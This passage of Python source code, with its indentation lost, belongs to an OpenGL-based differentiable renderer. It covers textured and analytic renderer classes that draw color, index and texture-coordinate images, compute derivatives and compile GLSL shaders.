GL.glBindTexture(GL.GL_TEXTURE_2D, 0)
GL.glBindVertexArray(0)
self.textureID = GL.glGetUniformLocation(self.colorTextureProgram, "myTextureSampler")
# def __del__(self):
# pass
# # self.release_textures()
@property
def shape(self):
return (self.frustum['height'], self.frustum['width'], 3)
@property
def num_channels(self):
return 3
def release_textures(self):
if hasattr(self, 'textureID_mesh_list'):
if self.textureID_mesh_list != []:
for texture_mesh in self.textureID_mesh_list:
if texture_mesh != []:
for texture in texture_mesh:
if texture != None:
GL.glDeleteTextures(1, [texture.value])
self.textureID_mesh_list = []
def compute_r(self):
return self.color_image # .reshape((self.frustum['height'], self.frustum['width'], -1)).squeeze()
@depends_on(dterms+terms)
def color_image(self):
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
no_overdraw = self.draw_color_image(with_vertex_colors=True, with_texture_on=True)
if not self.overdraw or self.msaa:
return no_overdraw
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
overdraw = self.draw_color_image()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# return overdraw * np.atleast_3d(self.boundarybool_image)
boundarybool_image = self.boundarybool_image
if self.num_channels > 1:
boundarybool_image = np.atleast_3d(boundarybool_image)
return np.asarray((overdraw*boundarybool_image + no_overdraw*(1-boundarybool_image)), order='C')
def image_mesh_bool(self, meshes):
self.makeCurrentContext()
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0.,0.,0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for mesh in meshes:
self.draw_index(mesh)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.uint32))[:,:,0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result!=0
@depends_on(dterms+terms)
def indices_image(self):
self._call_on_changed()
self.makeCurrentContext()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0.,0.,0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for index in range(len(self.f_list)):
self.draw_index(index)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.uint32))[:,:,0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result
def draw_index(self, index):
mesh = index
vbo_color = self.vbo_colors_mesh[mesh]
vc = self.vc_list[mesh]
colors = np.array(np.ones_like(vc)*(index)/255.0, dtype=np.float32)
#Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
vbo_color.bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, MVP)
GL.glDrawElements(primtype, len(vbo_f)*vbo_f.data.shape[1], GL.GL_UNSIGNED_INT, None)
def draw_texcoord_image(self, v, f, ft, boundarybool_image=None):
# gl = glf
# gl.Disable(GL_TEXTURE_2D)
# gl.DisableClientState(GL_TEXTURE_COORD_ARR
self.makeCurrentContext()
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# want vtc: texture-coordinates per vertex (not per element in vc)
colors = ft
#use the third channel to identify the corresponding textures.
color3 = np.vstack([np.ones([self.ft_list[mesh].shape[0],1])*mesh for mesh in range(len(self.ft_list))]).astype(np.float32) / len(self.ft_list)
colors = np.asarray(np.hstack((colors, color3)), np.float64, order='C')
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
#Why do we need this?
if boundarybool_image is not None:
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3)[:,:,:3].astype(np.float64))/255.0
result[:,:,1] = 1. - result[:,:,1]
return result
def compute_dr_wrt(self, wrt):
result = super().compute_dr_wrt(wrt)
if wrt is self.vc:
cim = self.draw_color_image(with_vertex_colors=False).ravel()
cim = sp.spdiags(row(cim), [0], cim.size, cim.size)
result = cim.dot(result)
elif wrt is self.texture_stack:
IS = np.nonzero(self.visibility_image.ravel() != 4294967295)[0]
texcoords, texidx = self.texcoord_image_quantized
vis_texidx = texidx.ravel()[IS]
vis_texcoords = texcoords.ravel()[IS]
JS = vis_texcoords * np.tile(col(vis_texidx), [1,2]).ravel()
clr_im = self.draw_color_image(with_vertex_colors=True, with_texture_on=False)
if False:
cv2.imshow('clr_im', clr_im)
# cv2.imshow('texmap', self.texture_image.r)
cv2.waitKey(1)
r = clr_im[:,:,0].ravel()[IS]
g = clr_im[:,:,1].ravel()[IS]
b = clr_im[:,:,2].ravel()[IS]
data = np.concatenate((r,g,b))
IS = np.concatenate((IS*3, IS*3+1, IS*3+2))
JS = np.concatenate((JS*3, JS*3+1, JS*3+2))
return sp.csc_matrix((data, (IS, JS)), shape=(self.r.size, wrt.r.size))
return result
def on_changed(self, which):
super().on_changed(which)
# have to redo if frustum changes, b/c frustum triggers new # context
# if 'frustum' in which:
if 'v' in which:
for mesh in range(len(self.f_list)):
self.vbo_verts_mesh[mesh].set_array(np.array(self.v_list[mesh]).astype(np.float32))
self.vbo_colors_mesh[mesh].set_array(np.array(self.vc_list[mesh]).astype(np.float32))
self.vbo_verts_mesh[mesh].bind()
self.vbo_colors_mesh[mesh].bind()
if 'f' in which:
self.vbo_indices.set_array(self.f.astype(np.uint32))
self.vbo_indices.bind()
self.vbo_indices_range.set_array(np.arange(self.f.size, dtype=np.uint32).ravel())
self.vbo_indices_range.bind()
if 'texture_stack' in which:
# gl = self.glf
# texture_data = np.array(self.texture_image*255., dtype='uint8', order='C')
# self.release_textures()
#
# for mesh in range(len(self.f_list)):
# textureIDs = []
# for polygons in range(len(self.f_list[mesh])):
# texture = None
# if self.haveUVs_list[mesh][polygons]:
# texture = GL.GLuint(0)
# GL.glGenTextures( 1, texture )
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# #Send texture.
# #Pol: Check if textures are float or uint from Blender import.
# image = (self.textures_list[mesh][polygons]*255.0).astype(np.uint8)
# GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, GL.GL_RGB8, image.shape[1], image.shape[0], 0, GL.GL_RGB, GL.GL_UNSIGNED_BYTE, image)
# textureIDs = textureIDs + [texture]
# self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs]
# gl.GenTextures(1, tmp) # TODO: free after done
# self.textureID = tmp[0]
if self.initialized:
textureCoordIdx = 0
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
#Update the OpenGL textures with all the textures. (Inefficient as many might not have changed).
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
self.textures_list[mesh][polygons] = self.texture_stack[textureCoordIdx:image.size+textureCoordIdx].reshape(image.shape)
textureCoordIdx = textureCoordIdx + image.size
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_UNSIGNED_BYTE,
image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
@depends_on('ft', 'textures')
def mesh_tex_coords(self):
ftidxs = self.ft.ravel()
data = self.ft
# Pol: careful with this:
data[:,1] = 1.0 - 1.0*data[:,1]
return data
# Depends on 'f' because vpe/fpe depend on f
# Pol: Check that depends on works on other attributes that depend_on x, if x changes.
@depends_on( 'ft', 'f')
def wireframe_tex_coords(self):
print("wireframe_tex_coords is being computed!")
vvt = np.zeros((self.v.r.size/3,2), dtype=np.float64, order='C')
vvt[self.f.flatten()] = self.mesh_tex_coords
edata = np.zeros((self.vpe.size,2), dtype=np.float64, order='C')
edata = vvt[self.ma.ravel()]
return edata
# TODO: can this not be inherited from base? turning off texture mapping in that instead?
@depends_on(dterms+terms)
def boundaryid_image(self):
self._call_on_changed()
# self.texture_mapping_of
self.makeCurrentContext()
GL.glUseProgram(self.colorProgram)
result = self.draw_boundaryid_image(self.v.r, self.f, self.vpe, self.fpe, self.camera)
GL.glUseProgram(self.colorTextureProgram)
# self.texture_mapping_on(with_vertex_colors=True)
return result
def draw_color_image(self, with_vertex_colors=True, with_texture_on=True):
self.makeCurrentContext()
self._call_on_changed()
GL.glEnable(GL.GL_MULTISAMPLE)
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1%self.num_channels], self.bgcolor.r[2%self.num_channels], 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
vbo_color = self.vbo_colors_mesh[mesh]
vc = self.vc_list[mesh]
colors = None
if with_vertex_colors:
colors = vc.r.astype(np.float32)
else:
#Only texture.
colors = np.ones_like(vc).astype(np.float32)
#Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
vbo_color.bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
if with_texture_on and self.haveUVs_list[mesh][polygons]:
GL.glUseProgram(self.colorTextureProgram)
texture = self.textureID_mesh_list[mesh][polygons]
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureID, 0)
else:
GL.glUseProgram(self.colorProgram)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawElements(primtype, len(vbo_f)*vbo_f.data.shape[1], GL.GL_UNSIGNED_INT, None)
if self.msaa:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_noms)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'], GL.GL_COLOR_BUFFER_BIT, GL.GL_LINEAR)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.float64))/255.0
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glClearColor(0.,0.,0., 1.)
if hasattr(self, 'background_image'):
bg_px = np.tile(np.atleast_3d(self.visibility_image) == 4294967295, (1,1,3))
fg_px = 1 - bg_px
result = bg_px * self.background_image + fg_px * result
return result
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image_quantized(self):
texcoord_image = self.texcoord_image[:,:, :2].copy()
#Temprary:
self.texture_image = self.textures_list[0][0].r.copy()
texcoord_image[:,:,0] *= self.texture_image.shape[1]-1
texcoord_image[:,:,1] *= self.texture_image.shape[0]-1
texture_idx = (self.texcoord_image[:,:,2]*len(self.ft_list)).astype(np.uint32)
texcoord_image = np.round(texcoord_image)
texcoord_image = texcoord_image[:,:,0] + texcoord_image[:,:,1]*self.texture_image.shape[1]
return texcoord_image, texture_idx
def checkBufferNum(self):
GL.glGenBuffers(1)
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image(self):
return self.draw_texcoord_image(self.v.r, self.f, self.ft, self.boundarybool_image if self.overdraw else None)
class AnalyticRenderer(ColoredRenderer):
terms = 'f', 'frustum', 'vt', 'ft', 'background_image', 'overdraw', 'ft_list', 'haveUVs_list', 'textures_list', 'vc_list' , 'imageGT'
dterms = 'vc', 'camera', 'bgcolor', 'texture_stack', 'v'
def __init__(self):
super().__init__()
def clear(self):
try:
GL.glFlush()
GL.glFinish()
# print ("Clearing textured renderer.")
# for msh in self.vbo_indices_mesh_list:
# for vbo in msh:
# vbo.set_array([])
[vbo.set_array(np.array([])) for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_face_ids_list for vbo in sublist]
[GL.glDeleteVertexArrays(1, [vao.value]) for sublist in self.vao_tex_mesh_list for vao in sublist]
self.release_textures()
if self.glMode == 'glfw':
import glfw
glfw.make_context_current(self.win)
GL.glDeleteProgram(self.colorTextureProgram)
super().clear()
except:
import pdb
pdb.set_trace()
print("Program had not been initialized")
def initGLTexture(self):
print("Initializing Texture OpenGL.")
FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
//#extension GL_EXT_shader_image_load_store : enable
in vec3 theColor;
in vec2 UV;
uniform sampler2D myTextureSampler;
// Ouput data
out vec3 color;
void main(){
color = theColor * texture2D( myTextureSampler, UV).rgb;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
layout(location = 2) in vec2 vertexUV;
uniform mat4 MVP;
out vec3 theColor;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
UV = vertexUV;
}""", GL.GL_VERTEX_SHADER)
self.colorTextureProgram = shaders.compileProgram(VERTEX_SHADER,FRAGMENT_SHADER)
#Define the other VAO/VBOs and shaders.
#Text VAO and bind color, vertex indices AND uvbuffer:
position_location = GL.glGetAttribLocation(self.colorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.colorTextureProgram, 'color')
uvs_location = GL.glGetAttribLocation(self.colorTextureProgram, 'vertexUV')
# color_location_ub = GL.glGetAttribLocation(self.colorProgram, 'color')
self.MVP_texture_location = GL.glGetUniformLocation(self.colorTextureProgram, 'MVP')
self.vbo_indices_mesh_list = []
self.vbo_colors_mesh = []
self.vbo_verts_mesh = []
self.vao_tex_mesh_list = []
self.vbo_uvs_mesh = []
self.textureID_mesh_list = []
# GL.glEnable(GL.GL_LINE_SMOOTH)
# GL.glHint(GL.GL_LINE_SMOOTH_HINT, GL.GL_NICEST)
GL.glLineWidth(2.)
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_indices_mesh = []
vbo_face_ids_mesh = []
vbo_colors_mesh = []
vbo_vertices_mesh = []
vbo_uvs_mesh = []
textureIDs_mesh = []
for polygons in range(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_verts = vbo.VBO(np.array(verts_by_face).astype(np.float32))
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_colors = vbo.VBO(np.array(colors_by_face).astype(np.float32))
uvs_by_face = np.asarray(self.ft_list[mesh].reshape((-1, 2))[f.ravel()], dtype=np.float32, order='C')
vbo_uvs = vbo.VBO(np.array(uvs_by_face).astype(np.float32))
vbo_indices = vbo.VBO(np.array(self.f_list[mesh][polygons]).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
vbo_indices.bind()
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
if self.haveUVs_list[mesh][polygons]:
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#Textures:
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = GL.GLuint(0)
GL.glGenTextures( 1, texture )
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
image = np.array(np.flipud((self.textures_list[mesh][polygons])), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
textureIDs_mesh = textureIDs_mesh + [texture]
vbo_indices_mesh = vbo_indices_mesh + [vbo_indices]
vbo_colors_mesh = vbo_colors_mesh + [vbo_colors]
vbo_vertices_mesh = vbo_vertices_mesh + [vbo_verts]
vbo_uvs_mesh = vbo_uvs_mesh + [vbo_uvs]
vaos_mesh = vaos_mesh + [vao]
self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs_mesh]
self.vao_tex_mesh_list = self.vao_tex_mesh_list + [vaos_mesh]
self.vbo_indices_mesh_list = self.vbo_indices_mesh_list + [vbo_indices_mesh]
self.vbo_colors_mesh = self.vbo_colors_mesh + [vbo_colors_mesh]
self.vbo_verts_mesh = self.vbo_verts_mesh + [vbo_vertices_mesh]
self.vbo_uvs_mesh = self.vbo_uvs_mesh + [vbo_uvs_mesh]
GL.glBindTexture(GL.GL_TEXTURE_2D, 0)
GL.glBindVertexArray(0)
self.textureID = GL.glGetUniformLocation(self.colorTextureProgram, "myTextureSampler")
def initGL_AnalyticRenderer(self):
self.initGLTexture()
self.updateRender = True
self.updateDerivatives = True
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 colorIn;
layout(location = 2) in vec2 vertexUV;
layout(location = 3) in uint face_id;
layout(location = 4) in vec3 barycentric;
uniform mat4 MVP;
out vec3 theColor;
out vec4 pos;
flat out uint face_out;
out vec3 barycentric_vert_out;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
pos = MVP * vec4(position,1);
//pos = pos4.xyz;
theColor = colorIn;
UV = vertexUV;
face_out = face_id;
barycentric_vert_out = barycentric;
}""", GL.GL_VERTEX_SHADER)
ERRORS_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
//layout(early_fragment_tests) in;
// Interpolated values from the vertex shaders
in vec3 theColor;
in vec2 UV;
flat in uint face_out;
in vec4 pos;
in vec3 barycentric_vert_out;
layout(location = 3) uniform sampler2D myTextureSampler;
uniform float ww;
uniform float wh;
// Ouput data
layout(location = 0) out vec3 color;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 barycentric1;
layout(location = 4) out vec2 barycentric2;
void main(){
vec3 finalColor = theColor * texture2D( myTextureSampler, UV).rgb;
color = finalColor.rgb;
sample_pos = ((0.5*pos.xy/pos.w) + 0.5)*vec2(ww,wh);
sample_face = face_out;
barycentric1 = barycentric_vert_out.xy;
barycentric2 = vec2(barycentric_vert_out.z, 0.);
}""", GL.GL_FRAGMENT_SHADER)
self.errorTextureProgram = shaders.compileProgram(VERTEX_SHADER, ERRORS_FRAGMENT_SHADER)
FETCH_VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
void main() {}
""", GL.GL_VERTEX_SHADER)
FETCH_GEOMETRY_SHADER = shaders.compileShader("""#version 330 core
layout(points) in;
layout(triangle_strip, max_vertices = 4) out;
const vec2 data[4] = vec2[]
(
vec2(-1.0, 1.0),
vec2(-1.0, -1.0),
vec2( 1.0, 1.0),
vec2( 1.0, -1.0)
);
void main() {
for (int i = 0; i < 4; ++i) {
gl_Position = vec4( data[i], 0.0, 1.0 );
EmitVertex();
}
EndPrimitive();
}""", GL.GL_GEOMETRY_SHADER)
FETCH_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
layout(location = 2) uniform sampler2DMS colors;
layout(location = 3) uniform sampler2DMS sample_positions;
layout(location = 4) uniform usampler2DMS sample_faces;
layout(location = 5) uniform sampler2DMS sample_barycentric_coords1;
layout(location = 6) uniform sampler2DMS sample_barycentric_coords2;
uniform float ww;
uniform float wh;
uniform int sample;
// Ouput data
layout(location = 0) out vec3 colorFetchOut;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 sample_barycentric1;
layout(location = 4) out vec2 sample_barycentric2;
//out int gl_SampleMask[];
const int all_sample_mask = 0xffff;
void main(){
ivec2 texcoord = ivec2(gl_FragCoord.xy);
colorFetchOut = texelFetch(colors, texcoord, sample).xyz;
sample_pos = texelFetch(sample_positions, texcoord, sample).xy;
sample_face = texelFetch(sample_faces, texcoord, sample).r;
sample_barycentric1 = texelFetch(sample_barycentric_coords1, texcoord, sample).xy;
sample_barycentric2 = texelFetch(sample_barycentric_coords2, texcoord, sample).xy;
}""", GL.GL_FRAGMENT_SHADER)
GL.glClampColor(GL.GL_CLAMP_READ_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_VERTEX_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_FRAGMENT_COLOR, False)
self.fetchSamplesProgram = shaders.compileProgram(FETCH_VERTEX_SHADER, FETCH_GEOMETRY_SHADER, FETCH_FRAGMENT_SHADER)
self.textureGT = GL.GLuint(0)
# GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glGenTextures(1, self.textureGT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
# self.textureGTLoc = GL.glGetUniformLocation(self.errorTextureProgram, "imageGT")
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# #
# try:
# if self.imageGT.r is not None and self.imageGT.r.size != 0: #if GT image is defined.
# image = np.array(np.flipud((self.imageGT.r)), order='C', dtype=np.float32)
# GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# except:
# pass
# GL.glGenTextures(1, self.textureEdges)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureEdges)
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glActiveTexture(GL.GL_TEXTURE0)
